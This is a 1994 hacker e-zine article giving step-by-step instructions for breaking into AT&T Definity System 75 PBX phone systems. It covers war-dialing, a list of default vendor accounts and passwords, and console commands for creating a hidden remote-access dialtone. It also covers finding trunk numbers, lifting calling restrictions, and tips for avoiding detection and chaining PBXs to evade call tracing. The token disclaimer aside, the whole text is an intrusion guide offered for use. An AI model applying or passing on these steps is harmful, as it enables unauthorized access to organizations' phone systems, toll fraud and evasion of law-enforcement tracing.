__
\ / |_
/ \ e n o n | o u n d a t i o n
presents:
\ /
*------ the \ /
/ \ files ------*
/ \
Spring/1994 Issue: 15
"Stealth in Diverting - PBX Style"
By: Erik Turbo
Disclaimer:
The information provided below is solely for the purpose of diverting
yourself from possible traces, ANI, and Caller ID. It is *not* to
be used for long distance toll fraud, including abusing 900 services,
using illicit calling cards, or other forms of credit card fraud.
Introduction
~~~~~~~~~~~~
A PBX, or Private Branch eXchange, is an on-premise facility, owned or leased
by an organization, which interconnects the telephones within the facility
and provides access to the public telephone system. Basically, it is a
mini-switching station, and allows a telephone user on the premises to dial
a three to four digit number (extension) to call another telephone on the
premises, and dials one digit (usually 8 or 9) to get a dial tone for an
"outside line," which allows the caller to dial out to the rest of the
public telephone user. This is the most important feature for a hacker that
desires the stealth that is necessary to continue his explorations. In short,
you can remain well-hidded if you use a PBX's outside lines to connect to the
computer you are hacking. That way, any Caller ID, ANI, or trace will reach
the PBX number - not your home telephone. When you have mastered the art of
PBX hacking, you should make a habit of diverting with 3 or 4 "well spaced"
PBX's before hitting your target destination. For the advanced hacker,
diverting with PBX's is just the beginning of his actual diversion; it is
best to bury yourself in packet-switched networks, loop in and out of
Internet hosts, bounce yourself off of satellites with International calling,
and utilize all of the data-based outdials that you have. Remember, abusing
these PBX's for un-necessary long distance calling is NOT condoned by me, or
any members of the Xenon Foundation; it will kill the PBX quicker, and place
you at risk of serious fraudulant charges.
Definity G Model System 75
~~~~~~~~~~~~~~~~~~~~~~~~~~
Definity model System 75 systems control a large number of medium-sized
(approx. 1000 lines) PBX's. It is owned by AT&T, and was developed in
the late 1970's, with modifications in 1983, and 1986. The actual System
75 machine has one or more incoming 1200bps data lines, which connect
at 7E1. It is through this remote port that you may begin your actual
hacking of the PBX. Since all of the changes you may via modem affect
the entire telephone network on the PBX, this is a power that you will
have to learn how to abstain from abusing. It is possible to turn the
once smoothly operating phone system into a chaotic mass of busy signals,
re-routes, Voice Mail Box's, tones, and bridges, effectively shutting down
the victim for hours, if not days. For this reason, I will only inform
readers on how to create a remote extension for diverting purposes.
Connection
~~~~~~~~~~
The best way to find a System 75 is to scan ("wargame dial") your local
telephone exchanges. There are still dozens of them around, and you
are bound to hit at least one in a few days of scanning. Upon connection
you will see the System 75 login and authorization prompts:
Login: xxx
Password: xxx
INCORRECT LOGIN
You will be given three chances to guess authorization password before
the system will drop carrier. On telephone systems that provide
Caller ID services, I would be weary; it is quite possible the System 75
dialup as well as the PBX are equipt with ANI for auditing purposes.
Default Accounts and Passwords
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
With every new System 75 package, AT&T includes a large number of
accounts and passwords already installed and ready for usage. Usually,
these passwords are never changed by the owners. Here is a listing of the
known System 75 default accounts and passwords that are included in every
Definity G package:
Login: enquiry Password: enquirypw
Login: init Password: initpw
Login: browse Password: looker
Login: maint Password: rwmaint
Login: locate Password: locatepw
Login: rcust Password: rcustpw
Login: tech Password: field
Login: cust Password: custpw
Login: inads Password: inads
Login: support Password: supportpw
Login: bcim Password: bcimpw
Login: bcnas Password: bcnspw
Login: craft Password: craftpw
Note: The browse account can *not* modify anything on the system 75.
It is only useful for examining the possibility of an existing
remote extension, not for the actual creation of one.
Internal System 75 Commands
~~~~~~~~~~~~~~~~~~~~~~~~~~~
If those defaults did not work, the only other alternatives is social
engineering, and brute force hacking. Both are not likely to work
unless you are a social engineering master, or have time to waste brute
force hacking. Your best bet is to move on and hope to scan a lesser
protected System 75.
Assuming you have passed the authorization, you will be prompted with
the following:
Terminal Type (513, 4410, 4425): [513]
These are the basic System 75 remote usage emulation codes. I prefer
to use 4410, as it appears much "cleaner" on a VT100 IBM PC. The
emulation is used to remotely send System 75 key sequences, to request
help, to save a session, to move forward a page, to move back a page, etc.
Since the IBM keyboard has no way to emulate these keys, the System 75
provides 3 basic emulation codes. For our purposes, use 4410. The
following sequences will work with emulation 4410:
ESC Op - To cancel a command
ESC Ot - To request Help
ESC Ov - Next Page
ESC Ow - Previous Page
ESC Or - Save
ESC Oq - Refresh Screen
ESC Os - Clear Fields
You can achieve the escape sequences by hitting the ESC key, and then the
key combination O and the following character.
Once you have choses emulation 4410, please remember (or take note) of the
previous escape sequences. You will not be able to save information
without knowing the proper code. ("ESC Or"). ESC Op is also very important
since it is the only method of stopping the execution of a command;
something you will have to do constantly when looking over certain pieces
of information within the System 75. Take these down!
Next you will see the AT&T banner and the command prompt:
Copyright (c) 1986 - AT&T
Unpublished & Not for Publication
All Rights Reserved
enter command:
There is online help avaiable at all times by pressing "ESC Ot", as well
as keying 'help' at the command prompt. Familiarize yourself with the
system. It is basically cryptic, as it is usually only used by
experienced AT&T technicians.
Examining the PBX
~~~~~~~~~~~~~~~~~
Once you are in, you now want to get to working on your diverter. What
you will obviously need is an extension dedicated explicitly for a dial
tone to the outside network. To accomplish this quickly and easily,
all you must do is type "change remote" at the command prompt. This
will bring you to the following screen:
change remote-access Page 1 of 1
REMOTE ACCESS
Remote Access Extension:
Barrier Code Length:
BARRIER CODE ASSIGNMENTS (Enter up to 10)
Barrier Code COR Barrier Code COR
1: 1 6: 1
2: 1 7: 1
3: 1 8: 1
4: 1 9: 1
5: 1 10: 1
As you can see, there is no remote access extension set up, therefor this
PBX does not have any existing dialtones available. Now to create one,
type in the extension you wish to direct you to your dialtone. The
extension you type in should be a 4 digit number, startin with "2" or "4"
as these are valid extensions under System 75 software. When you type
in your extension, press enter; if it gives you an error, try a different
extension until it accepts your input.
If you wish to add a security code on your dialtone, you may enter it's
length at the "Barrier Code Length:" prompt. Under the heading "Barrier
Code", at the "1:" prompt, type in your desired security code. After you
are all set, the screen should look something like this:
change remote-access Page 1 of 1
REMOTE ACCESS
Remote Access Extension: 2400
Barrier Code Length: 6
BARRIER CODE ASSIGNMENTS (Enter up to 10)
Barrier Code COR Barrier Code COR
1: 222222 1 6: 1
2: 1 7: 1
3: 1 8: 1
4: 1 9: 1
5: 1 10: 1
Now you have a working extension that is not only available for your
use in diverting, but also secure from others who do not know your
barrier code. Type the key combination "ESC Or" to save your work.
Finding the PBX Dialup
~~~~~~~~~~~~~~~~~~~~~~
Now that you are guarenteed a tone, you must find out the telephone number
the PBX is located at. Type "list trunk-group" at the command prompt.
It should give you a listing similar to this:
Group No. of Outgoing
Number TAC Group Type Group Name Members COR SMDR? Display?
1 801 co Incoming 12 1 y n
2 851 co Sales Room 1 1 y n
9 809 co Billing 4 1 y n
10 810 co Admin line 1 63 y n
Command successfully completed CANCEL P HELP T
Now that you have a listing of all the trunk groups that are present on the
PBX, you can individually list them to get their corresponding telephone
numbers. Type "display trunk-group 1", to display trunk group 1
(Group Number 1, Group Name "Incoming"). As you can see from the above
capture, there are 4 trunks available; 1, 2, 9, and 10. Display each of
them, and use the 'next page' ("ESC Ov") key combination to get to the
page (usually page 2, or 3) with the telephone numbers to the trunk. Each
time you display the trunks, you will get a screen similar to the
following:
display trunk-group 1 Page 1 of 5
TRUNK GROUP
Group Number: 1 Group Type: co SMDR Reports? y
Group Name: Incoming COR: 1 TAC: 801
Direction: two-way Outgoing Display? n Data Restriction? n
Dial Access? y Busy Threshold: 60 Night Service:
Queue Length: 0 Incoming Destination: 200
Comm Type: voice Digit Absorption List:
Prefix-1? n Restriction: toll Allowed Calls List? n
TRUNK PARAMETERS
Trunk Type: loop-start
Outgoing Dial Type: tone
Trunk Termination: rc Disconnect Timing(msec): 500
ACA Assignment? n
Maintenance Tests? y
Answer Supervision Timeout: Suppress # Outpulsing? n
_____________________________________________________________________________
To get the actual dialups, you must look on the following pages. The
"ESC Ov" combination will do that under emulation 4410:
_____________________________________________________________________________
display trunk-group 1 Page 2 of 5
TRUNK GROUP
GROUP MEMBER ASSIGNMENTS
Port Name Mode Type Answer Delay
1: A0101 555-2322
2: A0102 555-2342
3: A0103 555-2343
4: A0104 555-2345
5: A0105 555-2456
6: A0106 555-2457
7: A0107 555-2458
8: A0108 555-2459
9: A0201 555-2460
10: A0202 555-2461
11: A0203 555-2462
12: A0204 555-2470
13: A0205 555-2800
14: A0206 555-2810
15: A0207 555-2811
Make a note of the telephone numbers on the trunks, and dial them up after
logging off the System 75. When you dial them up voice, if one of
them prompts you for an extension, type in the remote extension you created
earlier. You should hear the tone to an outside line. If you created the
remote extension with a barrier code, touch-tone that in now. Next, dial "9"
to get an outside line (It can also be "8" on some systems), and then dial
the telephone number you want to reach, just as normally as you would from
your home telephone.
Tricks and Hints
~~~~~~~~~~~~~~~~
The following are methods and commands that can be used in addition to
the above mentioned hacking tactics. They are not necessary to the
smooth creation of a remote dialtone off of a PBX, however.
When you are displaying the trunk-groups individually, look under the
heading "Direction: " (found on page 1). If it says "one-way", then
modify that (with the "change trunk #" command) to say "two-way". Also
on page 1, change the "Incoming Destination: " header to reflect your
newly created remote access extension that you created earlier. On
the next page, get the dialups. You have just created a large set
of tones. Since they used to be "one-way", only users within the
building could use them to dialout, but since you have changed it to
"two-way", and changed the incoming destination extension to your
remote extension, you are allowing incoming callers to use the tone
service as well.
If you do not want to arouse suspicion, instead of changing the "Incoming
Destination: " to your extension, just change the "Night Service: " header
to your remote extension. With this, however, you can only use the tone
service after hours; usually after the business closes.
To get an idea of how the extensions are uniformly placed on the PBX,
type "display dialplan" at the command prompt. This will give you
all the prefix's to the three or four digit extensions. This is valuable
if you are having trouble finding a valid extension to use for your
remote extension.
When displaying a trunk group, mark down the COR (Class of Restriction)
number. Type "display COR #" (where # is the COR number of a specific
trunk). Make sure the FRL prompt is set to 7, and the calling restrictions
are set to "none". If not, type "change cor (COR #)", and make the
necessary modifications.
Type "display feature" to get a listing of all the feature access codes on
the system. This is valuable if you can not get an outside line by dialing
"9", or "8". The dialout access code will be in here.
Conclusion
~~~~~~~~~~~
Basically, it is extreemly simple to create a remote extension off of a
PBX in your local area. If you use the PBX just to make local calls and
to divert yourself further through the telephone network, it should last
a rather long time. However, if you abuse it by dialing Alliance
Teleconferences every night, or to call your friend in the UK three times
a day, it will either die, or get slapped with ANI.
I have tried to be as straight forward as possible, without having to
technically explain every detail of operation. Once you get the hang of
it, you should be able to create your remote extensions in under 10
minutes. However, if you are having problems, you can contact me at the
following locations:
Internet Mail: erikt@xf.com
Void of Deception: [508]/998-2400
Additional Reading:
~~~~~~~~~~~~~~~~~~~
Hacking AT&T System 75, Scott Simpson, Phrack 41, File 6.
System 75 Hacking (An Online Tutorial), Panther Modern, COTNO01.TXT, File 3.
Data and Computer Communications, William Stallings, Macmillan Publishing Co.